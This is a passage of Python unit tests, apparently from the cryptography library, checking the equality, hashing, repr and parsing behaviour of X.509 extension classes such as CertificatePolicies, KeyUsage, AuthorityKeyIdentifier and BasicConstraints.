delta2 = x509.DeltaCRLIndicator(1)
delta3 = x509.DeltaCRLIndicator(2)
assert hash(delta1) == hash(delta2)
assert hash(delta1) != hash(delta3)
class TestInvalidityDate(object):
def test_invalid_invalidity_date(self):
with pytest.raises(TypeError):
x509.InvalidityDate("notadate") # type:ignore[arg-type]
def test_eq(self):
invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
assert invalid1 == invalid2
def test_ne(self):
invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 2))
assert invalid1 != invalid2
assert invalid1 != object()
def test_repr(self):
invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
assert repr(invalid1) == (
"<InvalidityDate(invalidity_date=2015-01-01 01:01:00)>"
)
def test_hash(self):
invalid1 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
invalid2 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 1))
invalid3 = x509.InvalidityDate(datetime.datetime(2015, 1, 1, 1, 2))
assert hash(invalid1) == hash(invalid2)
assert hash(invalid1) != hash(invalid3)
class TestNoticeReference(object):
def test_notice_numbers_not_all_int(self):
with pytest.raises(TypeError):
x509.NoticeReference(
"org", [1, 2, "three"] # type:ignore[list-item]
)
def test_notice_numbers_none(self):
with pytest.raises(TypeError):
x509.NoticeReference("org", None) # type:ignore[arg-type]
def test_iter_input(self):
numbers = [1, 3, 4]
nr = x509.NoticeReference("org", iter(numbers))
assert list(nr.notice_numbers) == numbers
def test_repr(self):
nr = x509.NoticeReference("org", [1, 3, 4])
assert repr(nr) == (
"<NoticeReference(organization='org', notice_numbers=[1, 3, 4"
"])>"
)
def test_eq(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1, 2])
assert nr == nr2
def test_ne(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1])
nr3 = x509.NoticeReference(None, [1, 2])
assert nr != nr2
assert nr != nr3
assert nr != object()
def test_hash(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1, 2])
nr3 = x509.NoticeReference(None, [1, 2])
assert hash(nr) == hash(nr2)
assert hash(nr) != hash(nr3)
class TestUserNotice(object):
def test_notice_reference_invalid(self):
with pytest.raises(TypeError):
x509.UserNotice("invalid", None) # type:ignore[arg-type]
def test_notice_reference_none(self):
un = x509.UserNotice(None, "text")
assert un.notice_reference is None
assert un.explicit_text == "text"
def test_repr(self):
un = x509.UserNotice(x509.NoticeReference("org", [1]), "text")
assert repr(un) == (
"<UserNotice(notice_reference=<NoticeReference(organization='"
"org', notice_numbers=[1])>, explicit_text='text')>"
)
def test_eq(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1, 2])
un = x509.UserNotice(nr, "text")
un2 = x509.UserNotice(nr2, "text")
assert un == un2
def test_ne(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1])
un = x509.UserNotice(nr, "text")
un2 = x509.UserNotice(nr2, "text")
un3 = x509.UserNotice(nr, "text3")
assert un != un2
assert un != un3
assert un != object()
def test_hash(self):
nr = x509.NoticeReference("org", [1, 2])
nr2 = x509.NoticeReference("org", [1, 2])
un = x509.UserNotice(nr, "text")
un2 = x509.UserNotice(nr2, "text")
un3 = x509.UserNotice(None, "text")
assert hash(un) == hash(un2)
assert hash(un) != hash(un3)
class TestPolicyInformation(object):
def test_invalid_policy_identifier(self):
with pytest.raises(TypeError):
x509.PolicyInformation("notanoid", None) # type:ignore[arg-type]
def test_none_policy_qualifiers(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), None)
assert pi.policy_identifier == x509.ObjectIdentifier("1.2.3")
assert pi.policy_qualifiers is None
def test_policy_qualifiers(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
assert pi.policy_identifier == x509.ObjectIdentifier("1.2.3")
assert pi.policy_qualifiers == pq
def test_invalid_policy_identifiers(self):
with pytest.raises(TypeError):
x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
[1, 2], # type:ignore[list-item]
)
def test_iter_input(self):
qual = ["foo", "bar"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), iter(qual))
assert pi.policy_qualifiers is not None
assert list(pi.policy_qualifiers) == qual
def test_repr(self):
pq: typing.List[typing.Union[str, x509.UserNotice]] = [
"string",
x509.UserNotice(None, "hi"),
]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
assert repr(pi) == (
"<PolicyInformation(policy_identifier=<ObjectIdentifier(oid=1."
"2.3, name=Unknown OID)>, policy_qualifiers=['string', <UserNo"
"tice(notice_reference=None, explicit_text='hi')>])>"
)
def test_eq(self):
pi = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
assert pi == pi2
def test_ne(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string2"]
)
pi3 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3.4"), ["string"]
)
assert pi != pi2
assert pi != pi3
assert pi != object()
def test_hash(self):
pi = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"),
["string", x509.UserNotice(None, "hi")],
)
pi3 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), None)
assert hash(pi) == hash(pi2)
assert hash(pi) != hash(pi3)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificatePolicies(object):
def test_invalid_policies(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
with pytest.raises(TypeError):
x509.CertificatePolicies([1, pi]) # type:ignore[list-item]
def test_iter_len(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
cp = x509.CertificatePolicies([pi])
assert len(cp) == 1
for policyinfo in cp:
assert policyinfo == pi
def test_iter_input(self):
policies = [
x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
]
cp = x509.CertificatePolicies(iter(policies))
assert list(cp) == policies
def test_repr(self):
pq = ["string"]
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), pq)
cp = x509.CertificatePolicies([pi])
assert repr(cp) == (
"<CertificatePolicies([<PolicyInformation(policy_identifier=<O"
"bjectIdentifier(oid=1.2.3, name=Unknown OID)>, policy_qualifi"
"ers=['string'])>])>"
)
def test_eq(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string"]
)
cp2 = x509.CertificatePolicies([pi2])
assert cp == cp2
def test_ne(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string2"]
)
cp2 = x509.CertificatePolicies([pi2])
assert cp != cp2
assert cp != object()
def test_indexing(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["test"])
pi2 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.4"), ["test"])
pi3 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.5"), ["test"])
pi4 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.6"), ["test"])
pi5 = x509.PolicyInformation(x509.ObjectIdentifier("1.2.7"), ["test"])
cp = x509.CertificatePolicies([pi, pi2, pi3, pi4, pi5])
assert cp[-1] == cp[4]
assert cp[2:6:2] == [cp[2], cp[4]]
def test_long_oid(self, backend):
"""
Test that parsing a CertificatePolicies ext with
a very long OID succeeds.
"""
cert = _load_cert(
os.path.join("x509", "bigoid.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_class(x509.CertificatePolicies)
oid = x509.ObjectIdentifier(
"1.3.6.1.4.1.311.21.8.8950086.10656446.2706058"
".12775672.480128.147.13466065.13029902"
)
assert ext.value[0].policy_identifier == oid
def test_hash(self):
pi = x509.PolicyInformation(x509.ObjectIdentifier("1.2.3"), ["string"])
cp = x509.CertificatePolicies([pi])
pi2 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), ["string"]
)
cp2 = x509.CertificatePolicies([pi2])
pi3 = x509.PolicyInformation(
x509.ObjectIdentifier("1.2.3"), [x509.UserNotice(None, "text")]
)
cp3 = x509.CertificatePolicies([pi3])
assert hash(cp) == hash(cp2)
assert hash(cp) != hash(cp3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificatePoliciesExtension(object):
def test_cps_uri_policy_qualifier(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cp_cps_uri.pem"),
x509.load_pem_x509_certificate,
backend,
)
cp = cert.extensions.get_extension_for_oid(
ExtensionOID.CERTIFICATE_POLICIES
).value
assert cp == x509.CertificatePolicies(
[
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
["http://other.com/cps"],
)
]
)
def test_user_notice_with_notice_reference(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "cp_user_notice_with_notice_reference.pem"
),
x509.load_pem_x509_certificate,
backend,
)
cp = cert.extensions.get_extension_for_oid(
ExtensionOID.CERTIFICATE_POLICIES
).value
assert cp == x509.CertificatePolicies(
[
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
"http://example.com/cps",
"http://other.com/cps",
x509.UserNotice(
x509.NoticeReference("my org", [1, 2, 3, 4]),
"thing",
),
],
)
]
)
def test_user_notice_with_explicit_text(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "cp_user_notice_with_explicit_text.pem"
),
x509.load_pem_x509_certificate,
backend,
)
cp = cert.extensions.get_extension_for_oid(
ExtensionOID.CERTIFICATE_POLICIES
).value
assert cp == x509.CertificatePolicies(
[
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[x509.UserNotice(None, "thing")],
)
]
)
def test_user_notice_no_explicit_text(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "cp_user_notice_no_explicit_text.pem"
),
x509.load_pem_x509_certificate,
backend, | cp = cert.extensions.get_extension_for_oid(
ExtensionOID.CERTIFICATE_POLICIES
).value
assert cp == x509.CertificatePolicies(
[
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
x509.UserNotice(
x509.NoticeReference("my org", [1, 2, 3, 4]), None
)
],
)
]
)
class TestKeyUsage(object):
def test_key_agreement_false_encipher_decipher_true(self):
with pytest.raises(ValueError):
x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=True,
decipher_only=False,
)
with pytest.raises(ValueError):
x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=True,
decipher_only=True,
)
with pytest.raises(ValueError):
x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
def test_properties_key_agreement_true(self):
ku = x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert ku.digital_signature is True
assert ku.content_commitment is True
assert ku.key_encipherment is False
assert ku.data_encipherment is False
assert ku.key_agreement is False
assert ku.key_cert_sign is True
assert ku.crl_sign is False
def test_key_agreement_true_properties(self):
ku = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
assert ku.key_agreement is True
assert ku.encipher_only is False
assert ku.decipher_only is True
def test_key_agreement_false_properties(self):
ku = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert ku.key_agreement is False
with pytest.raises(ValueError):
ku.encipher_only
with pytest.raises(ValueError):
ku.decipher_only
def test_repr_key_agreement_false(self):
ku = x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert repr(ku) == (
"<KeyUsage(digital_signature=True, content_commitment=True, key_en"
"cipherment=False, data_encipherment=False, key_agreement=False, k"
"ey_cert_sign=True, crl_sign=False, encipher_only=False, decipher_"
"only=False)>"
)
def test_repr_key_agreement_true(self):
ku = x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert repr(ku) == (
"<KeyUsage(digital_signature=True, content_commitment=True, key_en"
"cipherment=False, data_encipherment=False, key_agreement=True, k"
"ey_cert_sign=True, crl_sign=False, encipher_only=False, decipher_"
"only=False)>"
)
def test_eq(self):
ku = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
ku2 = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
assert ku == ku2
def test_ne(self):
ku = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
ku2 = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert ku != ku2
assert ku != object()
def test_hash(self):
ku = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
ku2 = x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=True,
)
ku3 = x509.KeyUsage(
digital_signature=False,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=False,
crl_sign=False,
encipher_only=False,
decipher_only=False,
)
assert hash(ku) == hash(ku2)
assert hash(ku) != hash(ku3)
class TestSubjectKeyIdentifier(object):
def test_properties(self):
value = binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
ski = x509.SubjectKeyIdentifier(value)
assert ski.digest == value
assert ski.key_identifier == value
def test_repr(self):
ski = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
ext = x509.Extension(ExtensionOID.SUBJECT_KEY_IDENTIFIER, False, ski)
assert repr(ext) == (
"<Extension(oid=<ObjectIdentifier(oid=2.5.29.14, name=subjectK"
"eyIdentifier)>, critical=False, value=<SubjectKeyIdentifier(d"
"igest=b'\\t#\\x84\\x93\"0I\\x8b\\xc9\\x80\\xaa\\x80\\x98Eoo"
"\\xf7\\xff:\\xc9')>)>"
)
def test_eq(self):
ski = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
ski2 = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
assert ski == ski2
def test_ne(self):
ski = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
ski2 = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"aa8098456f6ff7ff3ac9092384932230498bc980")
)
assert ski != ski2
assert ski != object()
def test_hash(self):
ski1 = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
ski2 = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"092384932230498bc980aa8098456f6ff7ff3ac9")
)
ski3 = x509.SubjectKeyIdentifier(
binascii.unhexlify(b"aa8098456f6ff7ff3ac9092384932230498bc980")
)
assert hash(ski1) == hash(ski2)
assert hash(ski1) != hash(ski3)
class TestAuthorityKeyIdentifier(object):
def test_authority_cert_issuer_not_generalname(self):
with pytest.raises(TypeError):
x509.AuthorityKeyIdentifier(
b"identifier", ["notname"], 3 # type:ignore[list-item]
)
def test_authority_cert_serial_number_not_integer(self):
dirname = x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
x509.ObjectIdentifier("2.999.1"), "value1"
),
x509.NameAttribute(
x509.ObjectIdentifier("2.999.2"), "value2"
),
]
)
)
with pytest.raises(TypeError):
x509.AuthorityKeyIdentifier(
b"identifier", [dirname], "notanint" # type:ignore[arg-type]
)
def test_authority_issuer_none_serial_not_none(self):
with pytest.raises(ValueError):
x509.AuthorityKeyIdentifier(b"identifier", None, 3)
def test_authority_issuer_not_none_serial_none(self):
dirname = x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
x509.ObjectIdentifier("2.999.1"), "value1"
),
x509.NameAttribute(
x509.ObjectIdentifier("2.999.2"), "value2"
),
]
)
)
with pytest.raises(ValueError):
x509.AuthorityKeyIdentifier(b"identifier", [dirname], None)
def test_authority_cert_serial_and_issuer_none(self):
aki = x509.AuthorityKeyIdentifier(b"id", None, None)
assert aki.key_identifier == b"id"
assert aki.authority_cert_issuer is None
assert aki.authority_cert_serial_number is None
def test_authority_cert_serial_zero(self):
dns = x509.DNSName("SomeIssuer")
aki = x509.AuthorityKeyIdentifier(b"id", [dns], 0)
assert aki.key_identifier == b"id"
assert aki.authority_cert_issuer == [dns]
assert aki.authority_cert_serial_number == 0
def test_iter_input(self):
dirnames = [
x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
]
aki = x509.AuthorityKeyIdentifier(b"digest", iter(dirnames), 1234)
assert aki.authority_cert_issuer is not None
assert list(aki.authority_cert_issuer) == dirnames
def test_repr(self):
dirname = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
assert repr(aki) == (
"<AuthorityKeyIdentifier(key_identifier=b'digest', authority_"
"cert_issuer=[<DirectoryName(value=<Name(CN=myCN)>)>], author"
"ity_cert_serial_number=1234)>"
)
def test_eq(self):
dirname = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
dirname2 = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
aki2 = x509.AuthorityKeyIdentifier(b"digest", [dirname2], 1234)
assert aki == aki2
def test_ne(self):
dirname = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
dirname5 = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "aCN")])
)
aki = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
aki2 = x509.AuthorityKeyIdentifier(b"diges", [dirname], 1234)
aki3 = x509.AuthorityKeyIdentifier(b"digest", None, None)
aki4 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 12345)
aki5 = x509.AuthorityKeyIdentifier(b"digest", [dirname5], 12345)
assert aki != aki2
assert aki != aki3
assert aki != aki4
assert aki != aki5
assert aki != object()
def test_hash(self):
dirname = x509.DirectoryName(
x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "myCN")])
)
aki1 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
aki2 = x509.AuthorityKeyIdentifier(b"digest", [dirname], 1234)
aki3 = x509.AuthorityKeyIdentifier(b"digest", None, None)
assert hash(aki1) == hash(aki2)
assert hash(aki1) != hash(aki3)
class TestBasicConstraints(object):
def test_ca_not_boolean(self):
with pytest.raises(TypeError):
x509.BasicConstraints(
ca="notbool", path_length=None # type:ignore[arg-type]
)
def test_path_length_not_ca(self):
with pytest.raises(ValueError):
x509.BasicConstraints(ca=False, path_length=0)
def test_path_length_not_int(self):
with pytest.raises(TypeError):
x509.BasicConstraints(
ca=True, path_length=1.1 # type:ignore[arg-type]
)
with pytest.raises(TypeError):
x509.BasicConstraints(
ca=True, path_length="notint" # type:ignore[arg-type]
)
def test_path_length_negative(self):
with pytest.raises(TypeError):
x509.BasicConstraints(ca=True, path_length=-1)
def test_repr(self):
na = x509.BasicConstraints(ca=True, path_length=None)
assert repr(na) == ("<BasicConstraints(ca=True, path_length=None)>")
def test_hash(self):
na = x509.BasicConstraints(ca=True, path_length=None)
na2 = x509.BasicConstraints(ca=True, path_length=None)
na3 = x509.BasicConstraints(ca=True, path_length=0)
assert hash(na) == hash(na2)
assert hash(na) != hash(na3)
def test_eq(self):
na = x509.BasicConstraints(ca=True, path_length=None)
na2 = x509.BasicConstraints(ca=True, path_length=None)
assert na == na2
def test_ne(self):
na = x509.BasicConstraints(ca=True, path_length=None)
na2 = x509.BasicConstraints(ca=True, path_length=1)
na3 = x509.BasicConstraints(ca=False, path_length=None)
assert na != na2
assert na != na3
assert na != object()
class TestExtendedKeyUsage(object):
def test_not_all_oids(self):
with pytest.raises(TypeError):
x509.ExtendedKeyUsage(["notoid"]) # type:ignore[list-item]
def test_iter_len(self):
eku = x509.ExtendedKeyUsage(
[
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
]
)
assert len(eku) == 2
assert list(eku) == [
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CLIENT_AUTH,
]
def test_iter_input(self):
usages = [
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
]
aia = x509.ExtendedKeyUsage(iter(usages))
assert list(aia) == usages
def test_repr(self):
eku = x509.ExtendedKeyUsage(
[
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
]
)
assert repr(eku) == (
"<ExtendedKeyUsage([<ObjectIdentifier(oid=1.3.6.1.5.5.7.3.1, name="
"serverAuth)>, <ObjectIdentifier(oid=1.3.6.1.5.5.7.3.2, name=clien"
"tAuth)>])>"
)
def test_eq(self):
eku = x509.ExtendedKeyUsage(
[x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
)
eku2 = x509.ExtendedKeyUsage(
[x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
)
assert eku == eku2
def test_ne(self):
eku = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6")])
eku2 = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6.1")])
assert eku != eku2
assert eku != object()
def test_hash(self):
eku = x509.ExtendedKeyUsage(
[x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
)
eku2 = x509.ExtendedKeyUsage(
[x509.ObjectIdentifier("1.3.6"), x509.ObjectIdentifier("1.3.7")]
)
eku3 = x509.ExtendedKeyUsage([x509.ObjectIdentifier("1.3.6")])
assert hash(eku) == hash(eku2)
assert hash(eku) != hash(eku3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestExtensions(object):
def test_no_extensions(self, backend):
cert = _load_cert(
os.path.join("x509", "verisign_md2_root.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions
assert len(ext) == 0
assert list(ext) == []
with pytest.raises(x509.ExtensionNotFound) as exc:
ext.get_extension_for_oid(ExtensionOID.BASIC_CONSTRAINTS)
assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS
def test_one_extension(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "basic_constraints_not_critical.pem"
),
x509.load_pem_x509_certificate,
backend,
)
extensions = cert.extensions
ext = extensions.get_extension_for_oid(ExtensionOID.BASIC_CONSTRAINTS)
assert ext is not None
assert ext.value.ca is False
def test_duplicate_extension(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "two_basic_constraints.pem"),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(x509.DuplicateExtension) as exc:
cert.extensions
assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS
def test_unsupported_critical_extension(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "unsupported_extension_critical.pem"
),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
x509.ObjectIdentifier("1.2.3.4")
)
assert ext.value.value == b"value"
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
def test_unsupported_extension(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "unsupported_extension_2.pem"),
x509.load_pem_x509_certificate,
backend,
)
extensions = cert.extensions
assert len(extensions) == 2
assert extensions[0].critical is False
assert extensions[0].oid == x509.ObjectIdentifier(
"1.3.6.1.4.1.41482.2"
)
assert extensions[0].value == x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.3.6.1.4.1.41482.2"),
b"1.3.6.1.4.1.41482.1.2",
)
assert extensions[1].critical is False
assert extensions[1].oid == x509.ObjectIdentifier(
"1.3.6.1.4.1.45724.2.1.1"
)
assert extensions[1].value == x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.3.6.1.4.1.45724.2.1.1"), b"\x03\x02\x040"
)
def test_no_extensions_get_for_class(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
exts = cert.extensions
with pytest.raises(x509.ExtensionNotFound) as exc:
exts.get_extension_for_class(x509.IssuerAlternativeName)
assert exc.value.oid == ExtensionOID.ISSUER_ALTERNATIVE_NAME
def test_unrecognized_extension_for_class(self):
exts = x509.Extensions([])
with pytest.raises(TypeError):
exts.get_extension_for_class(x509.UnrecognizedExtension)
def test_indexing(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
exts = cert.extensions
assert exts[-1] == exts[7]
assert exts[2:6:2] == [exts[2], exts[4]]
def test_one_extension_get_for_class(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "basic_constraints_not_critical.pem"
),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_class(x509.BasicConstraints)
assert ext is not None
assert isinstance(ext.value, x509.BasicConstraints)
def test_repr(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "basic_constraints_not_critical.pem"
),
x509.load_pem_x509_certificate,
backend,
)
assert repr(cert.extensions) == (
"<Extensions([<Extension(oid=<ObjectIdentifier(oid=2.5.29.19, name"
"=basicConstraints)>, critical=False, value=<BasicConstraints(ca=F"
"alse, path_length=None)>)>])>"
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestBasicConstraintsExtension(object):
def test_ca_true_pathlen_6(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs", "pathLenConstraint6CACert.crt"
),
x509.load_der_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert ext is not None
assert ext.critical is True
assert ext.value.ca is True
assert ext.value.path_length == 6
def test_path_length_zero(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "bc_path_length_zero.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert ext is not None
assert ext.critical is True
assert ext.value.ca is True
assert ext.value.path_length == 0
def test_ca_true_no_pathlen(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert ext is not None
assert ext.critical is True
assert ext.value.ca is True
assert ext.value.path_length is None
def test_ca_false(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert ext is not None
assert ext.critical is True
assert ext.value.ca is False
assert ext.value.path_length is None
def test_no_basic_constraints(self, backend):
cert = _load_cert(
os.path.join(
"x509",
"PKITS_data",
"certs",
"ValidCertificatePathTest1EE.crt",
),
x509.load_der_x509_certificate,
backend,
)
